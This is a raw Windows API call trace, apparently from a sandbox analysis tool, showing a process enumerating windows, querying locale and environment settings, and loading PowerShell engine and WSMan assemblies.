	[0065.234] GetWindowThreadProcessId (in: hWnd=0x2001c, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x7a0
	[0065.234] GetWindowThreadProcessId (in: hWnd=0x6009c, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x594
	[0065.234] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x564
	[0065.234] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x45c
	[0065.234] GetWindowThreadProcessId (in: hWnd=0x100fe, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x548
	[0065.234] GetWindowThreadProcessId (in: hWnd=0x5008e, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x4a0
	[0065.234] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x518
	[0065.234] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x4a0
	[0065.234] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x4a0
	[0065.234] GetWindowThreadProcessId (in: hWnd=0x10068, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x4a0
	[0065.234] GetWindowThreadProcessId (in: hWnd=0x10110, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x508
	[0065.235] GetWindowThreadProcessId (in: hWnd=0x10064, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x4a0
	[0065.235] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x4ec
	[0065.235] GetWindowThreadProcessId (in: hWnd=0x1004c, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x4a0
	[0065.235] GetWindowThreadProcessId (in: hWnd=0x10044, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x45c
	[0065.235] GetWindowThreadProcessId (in: hWnd=0x20040, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x45c
	[0065.235] GetWindowThreadProcessId (in: hWnd=0x3003e, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x44c
	[0065.235] GetWindowThreadProcessId (in: hWnd=0x20022, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x7ec
	[0065.235] GetWindowThreadProcessId (in: hWnd=0x100ee, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x45c
	[0065.235] GetWindowThreadProcessId (in: hWnd=0x10134, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x324
	[0065.235] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x4a0
	[0065.235] GetWindowThreadProcessId (in: hWnd=0x1004e, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x4a0
	[0065.235] GetWindowThreadProcessId (in: hWnd=0x701f2, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x854
	[0065.236] GetWindowThreadProcessId (in: hWnd=0x101e0, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x914
	[0065.236] GetWindowThreadProcessId (in: hWnd=0x2019e, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x914
	[0065.236] GetWindowThreadProcessId (in: hWnd=0x501f4, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x140
	[0065.236] GetWindowThreadProcessId (in: hWnd=0x30218, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x55c
	[0065.236] GetWindowThreadProcessId (in: hWnd=0x30222, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x34c
	[0065.236] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0xb40
	[0065.236] GetWindowThreadProcessId (in: hWnd=0x201f8, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x988
	[0065.236] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x868
	[0065.236] GetWindowThreadProcessId (in: hWnd=0x201ac, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x850
	[0065.236] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x830
	[0065.236] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x814
	[0065.236] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x744
	[0065.237] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x2a8
	[0065.237] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x534
	[0065.237] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x5e4
	[0065.274] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x5c4
	[0065.274] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x58c
	[0065.275] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x238
	[0065.275] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x584
	[0065.275] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x7e8
	[0065.275] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x678
	[0065.275] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x35c
	[0065.275] GetWindowThreadProcessId (in: hWnd=0x10164, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x51c
	[0065.275] GetWindowThreadProcessId (in: hWnd=0x10160, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x360
	[0065.275] GetWindowThreadProcessId (in: hWnd=0x1015c, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x274
	[0065.275] GetWindowThreadProcessId (in: hWnd=0x10158, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x588
	[0065.275] GetWindowThreadProcessId (in: hWnd=0x80150, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0xc8
	[0065.275] GetWindowThreadProcessId (in: hWnd=0x400a0, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x21c
	[0065.275] GetWindowThreadProcessId (in: hWnd=0x1012e, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x664
	[0065.276] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x334
	[0065.276] GetWindowThreadProcessId (in: hWnd=0x1011c, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x5ec
	[0065.276] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x550
	[0065.276] GetWindowThreadProcessId (in: hWnd=0x20016, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x7a0
	[0065.276] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x594
	[0065.276] GetWindowThreadProcessId (in: hWnd=0x10106, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x45c
	[0065.276] GetWindowThreadProcessId (in: hWnd=0x10112, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x508
	[0065.276] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x4ec
	[0065.276] GetWindowThreadProcessId (in: hWnd=0x10042, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x45c
	[0065.276] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x7ec
	[0065.301] WerSetFlags () returned 0x0
	[0065.339] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0065.356] CoTaskMemFree (pv=0x0) 
	[0065.357] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x29de18, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x29de10 | out: pulNumLanguages=0x29de18, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x29de10) returned 1
	[0065.357] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x29de18, pwszLanguagesBuffer=0x2ccd6f0, pcchLanguagesBuffer=0x29de10 | out: pulNumLanguages=0x29de18, pwszLanguagesBuffer=0x2ccd6f0, pcchLanguagesBuffer=0x29de10) returned 1
	[0065.361] CoTaskMemAlloc (cb=0x24) returned 0x4c9aa0
	[0065.362] GetUserDefaultLocaleName (in: lpLocaleName=0x4c9aa0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0065.362] CoTaskMemFree (pv=0x4c9aa0) 
	[0065.385] CoTaskMemAlloc (cb=0x104) returned 0x4bdf80
	[0065.385] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4bdf80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0065.386] CoTaskMemFree (pv=0x4bdf80) 
	[0065.390] CoTaskMemAlloc (cb=0x104) returned 0x4bdf80
	[0065.390] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4bdf80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0065.390] CoTaskMemFree (pv=0x4bdf80) 
	[0065.393] CoTaskMemAlloc (cb=0x104) returned 0x4bdf80
	[0065.393] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4bdf80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0065.393] CoTaskMemFree (pv=0x4bdf80) 
	[0065.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0065.409] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0065.409] SetErrorMode (uMode=0x1) returned 0x1
	[0065.409] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x29da90 | out: lpFileInformation=0x29da90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0065.409] SetErrorMode (uMode=0x1) returned 0x1
	[0065.409] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x29dd00 | out: lpdwHandle=0x29dd00) returned 0x94c
	[0065.410] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2cd0f80 | out: lpData=0x2cd0f80) returned 1
	[0065.411] VerQueryValueW (in: pBlock=0x2cd0f80, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x29dc78, puLen=0x29dc70 | out: lplpBuffer=0x29dc78*=0x2cd101c, puLen=0x29dc70) returned 1
	[0065.411] VerQueryValueW (in: pBlock=0x2cd0f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x29dbe8, puLen=0x29dbe0 | out: lplpBuffer=0x29dbe8*=0x2cd10f8, puLen=0x29dbe0) returned 1
	[0065.411] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0065.411] CoTaskMemAlloc (cb=0x2e) returned 0x4c3d30
	[0065.411] lstrcpyW (in: lpString1=0x4c3d30, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0065.411] CoTaskMemFree (pv=0x4c3d30) 
	[0065.411] VerQueryValueW (in: pBlock=0x2cd0f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x29dbe8, puLen=0x29dbe0 | out: lplpBuffer=0x29dbe8*=0x2cd114c, puLen=0x29dbe0) returned 1
	[0065.411] lstrlenW (lpString="System.Management.Automation") returned 28
	[0065.411] CoTaskMemAlloc (cb=0x3c) returned 0x4d1050
	[0065.411] lstrcpyW (in: lpString1=0x4d1050, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0065.411] CoTaskMemFree (pv=0x4d1050) 
	[0065.411] VerQueryValueW (in: pBlock=0x2cd0f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x29dbe8, puLen=0x29dbe0 | out: lplpBuffer=0x29dbe8*=0x2cd11a8, puLen=0x29dbe0) returned 1
	[0065.411] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0065.411] CoTaskMemAlloc (cb=0x20) returned 0x4c9b00
	[0065.411] lstrcpyW (in: lpString1=0x4c9b00, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0065.411] CoTaskMemFree (pv=0x4c9b00) 
	[0065.411] VerQueryValueW (in: pBlock=0x2cd0f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x29dbe8, puLen=0x29dbe0 | out: lplpBuffer=0x29dbe8*=0x2cd11e8, puLen=0x29dbe0) returned 1
	[0065.411] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0065.411] CoTaskMemAlloc (cb=0x44) returned 0x4d1050
	[0065.411] lstrcpyW (in: lpString1=0x4d1050, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0065.412] CoTaskMemFree (pv=0x4d1050) 
	[0065.412] VerQueryValueW (in: pBlock=0x2cd0f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x29dbe8, puLen=0x29dbe0 | out: lplpBuffer=0x29dbe8*=0x2cd1250, puLen=0x29dbe0) returned 1
	[0065.412] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0065.412] CoTaskMemAlloc (cb=0x76) returned 0x464250
	[0065.412] lstrcpyW (in: lpString1=0x464250, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0065.412] CoTaskMemFree (pv=0x464250) 
	[0065.412] VerQueryValueW (in: pBlock=0x2cd0f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x29dbe8, puLen=0x29dbe0 | out: lplpBuffer=0x29dbe8*=0x2cd12ec, puLen=0x29dbe0) returned 1
	[0065.412] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0065.412] CoTaskMemAlloc (cb=0x44) returned 0x4d1050
	[0065.412] lstrcpyW (in: lpString1=0x4d1050, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0065.412] CoTaskMemFree (pv=0x4d1050) 
	[0065.412] VerQueryValueW (in: pBlock=0x2cd0f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x29dbe8, puLen=0x29dbe0 | out: lplpBuffer=0x29dbe8*=0x2cd1350, puLen=0x29dbe0) returned 1
	[0065.412] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0065.412] CoTaskMemAlloc (cb=0x58) returned 0x425a00
	[0065.412] lstrcpyW (in: lpString1=0x425a00, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0065.412] CoTaskMemFree (pv=0x425a00) 
	[0065.412] VerQueryValueW (in: pBlock=0x2cd0f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x29dbe8, puLen=0x29dbe0 | out: lplpBuffer=0x29dbe8*=0x2cd13cc, puLen=0x29dbe0) returned 1
	[0065.412] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0065.412] CoTaskMemAlloc (cb=0x20) returned 0x4c9b00
	[0065.412] lstrcpyW (in: lpString1=0x4c9b00, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0065.412] CoTaskMemFree (pv=0x4c9b00) 
	[0065.412] VerQueryValueW (in: pBlock=0x2cd0f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x29dbe8, puLen=0x29dbe0 | out: lplpBuffer=0x29dbe8*=0x2cd1074, puLen=0x29dbe0) returned 1
	[0065.412] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0065.412] CoTaskMemAlloc (cb=0x66) returned 0x4c7a90
	[0065.412] lstrcpyW (in: lpString1=0x4c7a90, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0065.412] CoTaskMemFree (pv=0x4c7a90) 
	[0065.412] VerQueryValueW (in: pBlock=0x2cd0f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x29dbe8, puLen=0x29dbe0 | out: lplpBuffer=0x29dbe8*=0x0, puLen=0x29dbe0) returned 0
	[0065.412] VerQueryValueW (in: pBlock=0x2cd0f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x29dbe8, puLen=0x29dbe0 | out: lplpBuffer=0x29dbe8*=0x0, puLen=0x29dbe0) returned 0
	[0065.412] VerQueryValueW (in: pBlock=0x2cd0f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x29dbe8, puLen=0x29dbe0 | out: lplpBuffer=0x29dbe8*=0x0, puLen=0x29dbe0) returned 0
	[0065.412] VerQueryValueW (in: pBlock=0x2cd0f80, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x29dbb8, puLen=0x29dbb0 | out: lplpBuffer=0x29dbb8*=0x2cd101c, puLen=0x29dbb0) returned 1
	[0065.412] CoTaskMemAlloc (cb=0x204) returned 0x46ba40
	[0065.412] VerLanguageNameW (in: wLang=0x0, szLang=0x46ba40, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0065.413] CoTaskMemFree (pv=0x46ba40) 
	[0065.413] VerQueryValueW (in: pBlock=0x2cd0f80, lpSubBlock="\\", lplpBuffer=0x29dc08, puLen=0x29dc00 | out: lplpBuffer=0x29dc08*=0x2cd0fa8, puLen=0x29dc00) returned 1
	[0065.423] CoTaskMemAlloc (cb=0x104) returned 0x4bdf80
	[0065.423] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4bdf80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0065.423] CoTaskMemFree (pv=0x4bdf80) 
	[0065.603] CoTaskMemAlloc (cb=0x104) returned 0x4bdf80
	[0065.603] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4bdf80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0065.603] CoTaskMemFree (pv=0x4bdf80) 
	[0065.614] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29dad8 | out: phkResult=0x29dad8*=0x308) returned 0x0
	[0065.615] RegOpenKeyExW (in: hKey=0x308, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x29dac8 | out: phkResult=0x29dac8*=0x30c) returned 0x0
	[0065.615] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x29db58 | out: phkResult=0x29db58*=0x310) returned 0x0
	[0065.620] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x29da9c, lpData=0x0, lpcbData=0x29da98*=0x0 | out: lpType=0x29da9c*=0x1, lpData=0x0, lpcbData=0x29da98*=0x56) returned 0x0
	[0065.620] CoTaskMemAlloc (cb=0x5a) returned 0x4c7a20
	[0065.620] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x29da6c, lpData=0x4c7a20, lpcbData=0x29da68*=0x56 | out: lpType=0x29da6c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x29da68*=0x56) returned 0x0
	[0065.621] CoTaskMemFree (pv=0x4c7a20) 
	[0065.708] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0065.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0065.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0065.830] CoTaskMemAlloc (cb=0x104) returned 0x4bdf80
	[0065.830] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4bdf80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0065.830] CoTaskMemFree (pv=0x4bdf80) 
	[0068.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x29d690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0068.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x29d690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0069.617] CoTaskMemAlloc (cb=0x104) returned 0x4be090
	[0069.617] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4be090, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0069.617] CoTaskMemFree (pv=0x4be090) 
	[0069.619] CoTaskMemAlloc (cb=0x104) returned 0x4be090
	[0069.619] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4be090, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0069.619] CoTaskMemFree (pv=0x4be090) 
	[0070.065] CoTaskMemAlloc (cb=0x104) returned 0x4be090
	[0070.065] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4be090, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0070.065] CoTaskMemFree (pv=0x4be090) 
	[0070.067] CoTaskMemAlloc (cb=0x104) returned 0x4be090
	[0070.067] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4be090, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0070.067] CoTaskMemFree (pv=0x4be090) 
	[0070.067] CoTaskMemAlloc (cb=0x104) returned 0x4be090
	[0070.067] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4be090, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0070.067] CoTaskMemFree (pv=0x4be090) 
	[0071.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x29d690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0071.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x29d690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0071.932] CoTaskMemAlloc (cb=0x104) returned 0x4be090
	[0071.932] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4be090, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0071.932] CoTaskMemFree (pv=0x4be090) 
	[0073.006] CoTaskMemAlloc (cb=0x104) returned 0x4be090
	[0073.006] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4be090, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0073.006] CoTaskMemFree (pv=0x4be090) 
	[0073.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
